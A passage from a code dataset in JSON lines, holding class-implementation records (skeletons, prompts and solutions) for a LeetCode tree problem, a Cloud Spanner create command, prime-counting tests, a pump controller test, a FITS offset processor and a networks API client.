return root\n pre = root\n while pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\n return root\n\n def connect2(self, root):\n \"\"\"bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\"\"\"\n if not root:\n return root\n queue = [(root, 0)]\n while queue:\n cur, depth = queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\n return root\n\n def connect3(self, root):\n \"\"\"' 递归版 :type root: Node :rtype: Node\"\"\"\n if not root or not root.left:\n return root\n root.left.next = root.right\n if root.next:\n root.right.next = root.next.left\n self.connect3(root.left)\n self.connect3(root.right)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "116_填充每个节点的下一个右侧节点指针.py", "source_repo": "lovehhf/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "f81931f2c6e14ce5f801ceaeeae8884a47883eeb", "bodies": ["flags.Instance().AddToParser(parser)\nflags.Config().AddToParser(parser)\nflags.Description().AddToParser(parser)\nresource_args.AddExpireBehaviorArg(parser)\nresource_args.AddInstanceTypeArg(parser)\ngroup_parser = parser.add_argument_group(mutex=True, required=False)\nflags.Nodes().AddToParser(group_parser)\nflags.ProcessingUnits().AddToParser(group_parser)\nbase.ASYNC_FLAG.AddToParser(parser)\nparser.display_info.AddCacheUpdater(flags.InstanceCompleter)", "instance_type = resource_args.GetInstanceType(args)\nexpire_behavior = resource_args.GetExpireBehavior(args)\nop = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\nif args.async_:\n return op\ninstance_operations.Await(op, 'Creating instance')"], "bodies_text": "<|body_start_0|>\n flags.Instance().AddToParser(parser)\n flags.Config().AddToParser(parser)\n flags.Description().AddToParser(parser)\n resource_args.AddExpireBehaviorArg(parser)\n resource_args.AddInstanceTypeArg(parser)\n group_parser = parser.add_argument_group(mutex=True, required=False)\n flags.Nodes().AddToParser(group_parser)\n flags.ProcessingUnits().AddToParser(group_parser)\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddCacheUpdater(flags.InstanceCompleter)\n<|end_body_0|>\n\n<|body_start_1|>\n instance_type = resource_args.GetInstanceType(args)\n expire_behavior = resource_args.GetExpireBehavior(args)\n op = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\n if args.async_:\n return op\n instance_operations.Await(op, 'Creating instance')\n<|end_body_1|>\n", "class_docstring": "Create a Cloud Spanner instance.", "class_name": "Create", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Create:\n \"\"\"Create a Cloud Spanner instance.\"\"\"\n\n def Args(parser):\n \"\"\"Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n flags.Instance().AddToParser(parser)\n flags.Config().AddToParser(parser)\n flags.Description().AddToParser(parser)\n resource_args.AddExpireBehaviorArg(parser)\n resource_args.AddInstanceTypeArg(parser)\n group_parser = parser.add_argument_group(mutex=True, required=False)\n flags.Nodes().AddToParser(group_parser)\n flags.ProcessingUnits().AddToParser(group_parser)\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddCacheUpdater(flags.InstanceCompleter)\n<|end_body_0|>\n\n<|body_start_1|>\n instance_type = resource_args.GetInstanceType(args)\n expire_behavior = resource_args.GetExpireBehavior(args)\n op = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\n if args.async_:\n return op\n instance_operations.Await(op, 'Creating instance')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000254", "length_bytes": 5848, "license_type": "permissive", "methods": [{"docstring": "Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.", "name": "Args", "signature": "def Args(parser)"}, {"docstring": "This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.", "name": "Run", "signature": "def Run(self, args)"}], "n_methods": 2, "prompt": "Implement the Python class `Create` described below.\n\nClass description:\nCreate a Cloud Spanner instance.\n\nMethod signatures and docstrings:\n- def Args(parser): Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\n- def Run(self, args): This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.", "prompted_full_text": "Implement the Python class `Create` described below.\n\nClass description:\nCreate a Cloud Spanner instance.\n\nMethod signatures and docstrings:\n- def Args(parser): Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\n- def Run(self, args): This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\n\n<|skeleton|>\nclass Create:\n \"\"\"Create a Cloud Spanner instance.\"\"\"\n\n def Args(parser):\n \"\"\"Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n flags.Instance().AddToParser(parser)\n flags.Config().AddToParser(parser)\n flags.Description().AddToParser(parser)\n resource_args.AddExpireBehaviorArg(parser)\n resource_args.AddInstanceTypeArg(parser)\n group_parser = parser.add_argument_group(mutex=True, required=False)\n flags.Nodes().AddToParser(group_parser)\n flags.ProcessingUnits().AddToParser(group_parser)\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddCacheUpdater(flags.InstanceCompleter)\n<|end_body_0|>\n\n<|body_start_1|>\n instance_type = resource_args.GetInstanceType(args)\n expire_behavior = resource_args.GetExpireBehavior(args)\n op = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\n if args.async_:\n return op\n instance_operations.Await(op, 'Creating instance')\n<|end_body_1|>\n", "revision_id": "392abf004b16203030e6efd2f0af24db7c8d669e", "skeleton": "<|skeleton|>\nclass Create:\n \"\"\"Create a Cloud Spanner instance.\"\"\"\n\n def Args(parser):\n \"\"\"Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\"\"\"\n <|body_0|>\n\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Create:\n \"\"\"Create a Cloud Spanner instance.\"\"\"\n\n def Args(parser):\n \"\"\"Args is called by calliope to gather arguments for this command. Please add arguments in alphabetical order except for no- or a clear- pair for that argument which can follow the argument itself. Args: parser: An argparse parser that you can use to add arguments that go on the command line after this command. Positional arguments are allowed.\"\"\"\n flags.Instance().AddToParser(parser)\n flags.Config().AddToParser(parser)\n flags.Description().AddToParser(parser)\n resource_args.AddExpireBehaviorArg(parser)\n resource_args.AddInstanceTypeArg(parser)\n group_parser = parser.add_argument_group(mutex=True, required=False)\n flags.Nodes().AddToParser(group_parser)\n flags.ProcessingUnits().AddToParser(group_parser)\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddCacheUpdater(flags.InstanceCompleter)\n\n def Run(self, args):\n \"\"\"This is what gets called when the user runs this command. Args: args: an argparse namespace. All the arguments that were provided to this command invocation. Returns: Some value that we want to have printed later.\"\"\"\n instance_type = resource_args.GetInstanceType(args)\n expire_behavior = resource_args.GetExpireBehavior(args)\n op = instances.Create(args.instance, args.config, args.description, args.nodes, args.processing_units, instance_type, expire_behavior)\n if args.async_:\n return op\n instance_operations.Await(op, 'Creating instance')\n", "source": "the_stack_v2_python_sparse", "source_path": "lib/surface/spanner/instances/create.py", "source_repo": "google-cloud-sdk-unofficial/google-cloud-sdk", "split": "test", "star_events_count": 9} {"blob_id": "d1b787336fe35da55a36dee3da81a43b697fdbd0", "bodies": ["sol = solution.Solution()\nself.assertTrue(sol.isPrime(2))\nself.assertTrue(sol.isPrime(3))\nself.assertTrue(sol.isPrime(7))", "sol = solution.Solution()\nself.assertFalse(sol.isPrime(1))\nself.assertFalse(sol.isPrime(4))\nself.assertFalse(sol.isPrime(6))", "sol = solution.Solution()\nn = 10\nself.assertEqual(4, sol.countPrimes(n))", "sol = solution.Solution()\nn = 0\nself.assertEqual(0, sol.countPrimes(n))", "sol = solution.Solution()\nn = 1\nself.assertEqual(0, sol.countPrimes(n))"], "bodies_text": "<|body_start_0|>\n sol = solution.Solution()\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n<|end_body_0|>\n\n<|body_start_1|>\n sol = solution.Solution()\n self.assertFalse(sol.isPrime(1))\n self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n<|end_body_1|>\n\n<|body_start_2|>\n sol = solution.Solution()\n n = 10\n self.assertEqual(4, sol.countPrimes(n))\n<|end_body_2|>\n\n<|body_start_3|>\n sol = solution.Solution()\n n = 0\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_3|>\n\n<|body_start_4|>\n sol = solution.Solution()\n n = 1\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_4|>\n", "class_docstring": "", "class_name": "TestMethods", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestMethods:\n\n def test_is_prime_valid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_0|>\n\n def test_is_prime_invalid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_1|>\n\n def test_example_1(self):\n \"\"\"Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\"\"\"\n <|body_2|>\n\n def test_example_2(self):\n \"\"\"Example 2: Input: n = 0 Output: 0\"\"\"\n <|body_3|>\n\n def test_example_3(self):\n \"\"\"Example 3: Input: n = 1 Output: 0\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sol = solution.Solution()\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n<|end_body_0|>\n\n<|body_start_1|>\n sol = solution.Solution()\n self.assertFalse(sol.isPrime(1))\n self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n<|end_body_1|>\n\n<|body_start_2|>\n sol = solution.Solution()\n n = 10\n self.assertEqual(4, sol.countPrimes(n))\n<|end_body_2|>\n\n<|body_start_3|>\n sol = solution.Solution()\n n = 0\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_3|>\n\n<|body_start_4|>\n sol = solution.Solution()\n n = 1\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000255", "length_bytes": 1455, "license_type": "no_license", "methods": [{"docstring": "Valid primes are 2, 3, 5, 7.", "name": "test_is_prime_valid", "signature": "def test_is_prime_valid(self)"}, {"docstring": "Valid primes are 2, 3, 5, 7.", "name": "test_is_prime_invalid", "signature": "def test_is_prime_invalid(self)"}, {"docstring": "Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.", "name": "test_example_1", "signature": "def test_example_1(self)"}, {"docstring": "Example 2: Input: n = 0 Output: 0", "name": "test_example_2", "signature": "def test_example_2(self)"}, {"docstring": "Example 3: Input: n = 1 Output: 0", "name": "test_example_3", "signature": "def test_example_3(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_000269", "prompt": "Implement the Python class `TestMethods` described below.\n\nClass description:\nImplement the TestMethods class.\n\nMethod signatures and docstrings:\n- def test_is_prime_valid(self): Valid primes are 2, 3, 5, 7.\n- def test_is_prime_invalid(self): Valid primes are 2, 3, 5, 7.\n- def test_example_1(self): Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\n- def test_example_2(self): Example 2: Input: n = 0 Output: 0\n- def test_example_3(self): Example 3: Input: n = 1 Output: 0", "prompted_full_text": "Implement the Python class `TestMethods` described below.\n\nClass description:\nImplement the TestMethods class.\n\nMethod signatures and docstrings:\n- def test_is_prime_valid(self): Valid primes are 2, 3, 5, 7.\n- def test_is_prime_invalid(self): Valid primes are 2, 3, 5, 7.\n- def test_example_1(self): Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\n- def test_example_2(self): Example 2: Input: n = 0 Output: 0\n- def test_example_3(self): Example 3: Input: n = 1 Output: 0\n\n<|skeleton|>\nclass TestMethods:\n\n def test_is_prime_valid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_0|>\n\n def test_is_prime_invalid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_1|>\n\n def test_example_1(self):\n \"\"\"Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\"\"\"\n <|body_2|>\n\n def test_example_2(self):\n \"\"\"Example 2: Input: n = 0 Output: 0\"\"\"\n <|body_3|>\n\n def test_example_3(self):\n \"\"\"Example 3: Input: n = 1 Output: 0\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sol = solution.Solution()\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n<|end_body_0|>\n\n<|body_start_1|>\n sol = solution.Solution()\n self.assertFalse(sol.isPrime(1))\n self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n<|end_body_1|>\n\n<|body_start_2|>\n sol = solution.Solution()\n n = 10\n self.assertEqual(4, sol.countPrimes(n))\n<|end_body_2|>\n\n<|body_start_3|>\n sol = solution.Solution()\n n = 0\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_3|>\n\n<|body_start_4|>\n sol = solution.Solution()\n n = 1\n self.assertEqual(0, sol.countPrimes(n))\n<|end_body_4|>\n", "revision_id": "52d71a93de7f002ac887a82c947e1e32a3e7255f", "skeleton": "<|skeleton|>\nclass TestMethods:\n\n def test_is_prime_valid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_0|>\n\n def test_is_prime_invalid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n <|body_1|>\n\n def test_example_1(self):\n \"\"\"Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\"\"\"\n <|body_2|>\n\n def test_example_2(self):\n \"\"\"Example 2: Input: n = 0 Output: 0\"\"\"\n <|body_3|>\n\n def test_example_3(self):\n \"\"\"Example 3: Input: n = 1 Output: 0\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestMethods:\n def test_is_prime_valid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n sol = solution.Solution()\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n\n def test_is_prime_invalid(self):\n \"\"\"Valid primes are 2, 3, 5, 7.\"\"\"\n sol = solution.Solution()\n self.assertFalse(sol.isPrime(1))\n self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n\n def test_example_1(self):\n \"\"\"Example 1: Input: n = 10 Output: 4 Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\"\"\"\n sol = solution.Solution()\n n = 10\n self.assertEqual(4, sol.countPrimes(n))\n\n def test_example_2(self):\n \"\"\"Example 2: Input: n = 0 Output: 0\"\"\"\n sol = solution.Solution()\n n = 0\n self.assertEqual(0, sol.countPrimes(n))\n\n def test_example_3(self):\n \"\"\"Example 3: Input: n = 1 Output: 0\"\"\"\n sol = solution.Solution()\n n = 1\n self.assertEqual(0, sol.countPrimes(n))\n", "source": "the_stack_v2_python_sparse", "source_path": "count-primes/test.py", "source_repo": "code-in-public/leetcode", "split": "test", "star_events_count": 3} {"blob_id": "dade8670a6538df136ed6fbb61c6487cf4454292", "bodies": ["self.pump = Pump('127.0.0.1', 8000)\nself.sensor = Sensor('127.0.0.1', 8000)\nself.decider = Decider(100, 0.05)\nself.controller = Controller(self.sensor, self.pump, self.decider)", "self.sensor.measure = MagicMock(return_value=90)\nself.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\nself.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\nself.pump.set_state = MagicMock(return_value=True)\nself.controller.tick()\nself.sensor.measure.assert_called_with()\nself.pump.get_state.assert_called_with()\nself.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\nself.pump.set_state.assert_called_with(self.pump.PUMP_IN)"], "bodies_text": "<|body_start_0|>\n self.pump = Pump('127.0.0.1', 8000)\n self.sensor = Sensor('127.0.0.1', 8000)\n self.decider = Decider(100, 0.05)\n self.controller = Controller(self.sensor, self.pump, self.decider)\n<|end_body_0|>\n\n<|body_start_1|>\n self.sensor.measure = MagicMock(return_value=90)\n self.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\n self.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\n self.pump.set_state = MagicMock(return_value=True)\n self.controller.tick()\n self.sensor.measure.assert_called_with()\n self.pump.get_state.assert_called_with()\n self.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\n self.pump.set_state.assert_called_with(self.pump.PUMP_IN)\n<|end_body_1|>\n", "class_docstring": "Unit tests for the Controller class", "class_name": "ControllerTests", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ControllerTests:\n \"\"\"Unit tests for the Controller class\"\"\"\n\n def setUp(self):\n \"\"\"setUp method for Controller tests\"\"\"\n <|body_0|>\n\n def test_tick(self):\n \"\"\"Test for the tick function\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.pump = Pump('127.0.0.1', 8000)\n self.sensor = Sensor('127.0.0.1', 8000)\n self.decider = Decider(100, 0.05)\n self.controller = Controller(self.sensor, self.pump, self.decider)\n<|end_body_0|>\n\n<|body_start_1|>\n self.sensor.measure = MagicMock(return_value=90)\n self.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\n self.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\n self.pump.set_state = MagicMock(return_value=True)\n self.controller.tick()\n self.sensor.measure.assert_called_with()\n self.pump.get_state.assert_called_with()\n self.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\n self.pump.set_state.assert_called_with(self.pump.PUMP_IN)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000256", "length_bytes": 2522, "license_type": "no_license", "methods": [{"docstring": "setUp method for Controller tests", "name": "setUp", "signature": "def setUp(self)"}, {"docstring": "Test for the tick function", "name": "test_tick", "signature": "def test_tick(self)"}], "n_methods": 2, "prompt": "Implement the Python class `ControllerTests` described below.\n\nClass description:\nUnit tests for the Controller class\n\nMethod signatures and docstrings:\n- def setUp(self): setUp method for Controller tests\n- def test_tick(self): Test for the tick function", "prompted_full_text": "Implement the Python class `ControllerTests` described below.\n\nClass description:\nUnit tests for the Controller class\n\nMethod signatures and docstrings:\n- def setUp(self): setUp method for Controller tests\n- def test_tick(self): Test for the tick function\n\n<|skeleton|>\nclass ControllerTests:\n \"\"\"Unit tests for the Controller class\"\"\"\n\n def setUp(self):\n \"\"\"setUp method for Controller tests\"\"\"\n <|body_0|>\n\n def test_tick(self):\n \"\"\"Test for the tick function\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.pump = Pump('127.0.0.1', 8000)\n self.sensor = Sensor('127.0.0.1', 8000)\n self.decider = Decider(100, 0.05)\n self.controller = Controller(self.sensor, self.pump, self.decider)\n<|end_body_0|>\n\n<|body_start_1|>\n self.sensor.measure = MagicMock(return_value=90)\n self.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\n self.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\n self.pump.set_state = MagicMock(return_value=True)\n self.controller.tick()\n self.sensor.measure.assert_called_with()\n self.pump.get_state.assert_called_with()\n self.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\n self.pump.set_state.assert_called_with(self.pump.PUMP_IN)\n<|end_body_1|>\n", "revision_id": "b1fea0309b3495b3e1dc167d7029bc9e4b6f00f1", "skeleton": "<|skeleton|>\nclass ControllerTests:\n \"\"\"Unit tests for the Controller class\"\"\"\n\n def setUp(self):\n \"\"\"setUp method for Controller tests\"\"\"\n <|body_0|>\n\n def test_tick(self):\n \"\"\"Test for the tick function\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ControllerTests:\n \"\"\"Unit tests for the Controller class\"\"\"\n\n def setUp(self):\n \"\"\"setUp method for Controller tests\"\"\"\n self.pump = Pump('127.0.0.1', 8000)\n self.sensor = Sensor('127.0.0.1', 8000)\n self.decider = Decider(100, 0.05)\n self.controller = Controller(self.sensor, self.pump, self.decider)\n\n def test_tick(self):\n \"\"\"Test for the tick function\"\"\"\n self.sensor.measure = MagicMock(return_value=90)\n self.pump.get_state = MagicMock(return_value=Pump.PUMP_OFF)\n self.decider.decide = MagicMock(return_value=Pump.PUMP_IN)\n self.pump.set_state = MagicMock(return_value=True)\n self.controller.tick()\n self.sensor.measure.assert_called_with()\n self.pump.get_state.assert_called_with()\n self.decider.decide.assert_called_with(90, self.pump.PUMP_OFF, self.controller.actions)\n self.pump.set_state.assert_called_with(self.pump.PUMP_IN)\n", "source": "the_stack_v2_python_sparse", "source_path": "students/wwhite/Lesson06/water-regulation/waterregulation/test.py", "source_repo": "UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018", "split": "test", "star_events_count": 4} {"blob_id": "f48c8bed0752f6a8c52f88ff97e588ac951420da", "bodies": ["Offsets.__init__(self, **kwargs)\nself.center = center\nself.target = target", "target = [image.header[x] for x in self.target]\ncenter = [image.header[x] for x in self.center]\nimage.meta['offsets'] = np.subtract(target, center)\nreturn image"], "bodies_text": "<|body_start_0|>\n Offsets.__init__(self, **kwargs)\n self.center = center\n self.target = target\n<|end_body_0|>\n\n<|body_start_1|>\n target = [image.header[x] for x in self.target]\n center = [image.header[x] for x in self.center]\n image.meta['offsets'] = np.subtract(target, center)\n return image\n<|end_body_1|>\n", "class_docstring": "An offset-calculation method based on fits headers.", "class_name": "FitsHeaderOffsets", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FitsHeaderOffsets:\n \"\"\"An offset-calculation method based on fits headers.\"\"\"\n\n def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any):\n \"\"\"Initializes new fits header offsets.\"\"\"\n <|body_0|>\n\n async def __call__(self, image: Image) -> Image:\n \"\"\"Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Offsets.__init__(self, **kwargs)\n self.center = center\n self.target = target\n<|end_body_0|>\n\n<|body_start_1|>\n target = [image.header[x] for x in self.target]\n center = [image.header[x] for x in self.center]\n image.meta['offsets'] = np.subtract(target, center)\n return image\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000257", "length_bytes": 1149, "license_type": "permissive", "methods": [{"docstring": "Initializes new fits header offsets.", "name": "__init__", "signature": "def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any)"}, {"docstring": "Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.", "name": "__call__", "signature": "async def __call__(self, image: Image) -> Image"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000405", "prompt": "Implement the Python class `FitsHeaderOffsets` described below.\n\nClass description:\nAn offset-calculation method based on fits headers.\n\nMethod signatures and docstrings:\n- def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any): Initializes new fits header offsets.\n- async def __call__(self, image: Image) -> Image: Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.", "prompted_full_text": "Implement the Python class `FitsHeaderOffsets` described below.\n\nClass description:\nAn offset-calculation method based on fits headers.\n\nMethod signatures and docstrings:\n- def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any): Initializes new fits header offsets.\n- async def __call__(self, image: Image) -> Image: Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.\n\n<|skeleton|>\nclass FitsHeaderOffsets:\n \"\"\"An offset-calculation method based on fits headers.\"\"\"\n\n def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any):\n \"\"\"Initializes new fits header offsets.\"\"\"\n <|body_0|>\n\n async def __call__(self, image: Image) -> Image:\n \"\"\"Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Offsets.__init__(self, **kwargs)\n self.center = center\n self.target = target\n<|end_body_0|>\n\n<|body_start_1|>\n target = [image.header[x] for x in self.target]\n center = [image.header[x] for x in self.center]\n image.meta['offsets'] = np.subtract(target, center)\n return image\n<|end_body_1|>\n", "revision_id": "2d7a06e5485b61b6ca7e51d99b08651ea6021086", "skeleton": "<|skeleton|>\nclass FitsHeaderOffsets:\n \"\"\"An offset-calculation method based on fits headers.\"\"\"\n\n def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any):\n \"\"\"Initializes new fits header offsets.\"\"\"\n <|body_0|>\n\n async def __call__(self, image: Image) -> Image:\n \"\"\"Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FitsHeaderOffsets:\n \"\"\"An offset-calculation method based on fits headers.\"\"\"\n\n def __init__(self, target: Tuple[str, str], center: Tuple[str, str]=('DET-CPX1', 'DET-CPX2'), **kwargs: Any):\n \"\"\"Initializes new fits header offsets.\"\"\"\n Offsets.__init__(self, **kwargs)\n self.center = center\n self.target = target\n\n async def __call__(self, image: Image) -> Image:\n \"\"\"Processes an image and sets x/y pixel offset to reference in offset attribute. Args: image: Image to process. Returns: Original image. Raises: ValueError: If offset could not be found.\"\"\"\n target = [image.header[x] for x in self.target]\n center = [image.header[x] for x in self.center]\n image.meta['offsets'] = np.subtract(target, center)\n return image\n", "source": "the_stack_v2_python_sparse", "source_path": "pyobs/images/processors/offsets/fitsheader.py", "source_repo": "pyobs/pyobs-core", "split": "test", "star_events_count": 9} {"blob_id": "fcf047a85d18a87216609c25a5b9e306797de300", "bodies": ["super(NetworksClient, self).__init__(serialize_format, deserialize_format)\nself.auth_token = auth_token\nself.default_headers['X-Auth-Token'] = auth_token\nct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\naccept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\nself.default_headers['Content-Type'] = ct\nself.default_headers['Accept'] = accept\nif tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\nself.url = url", "url = '{base_url}/networks'.format(base_url=self.url)\nrequest = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\nresp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\nreturn resp", "url = 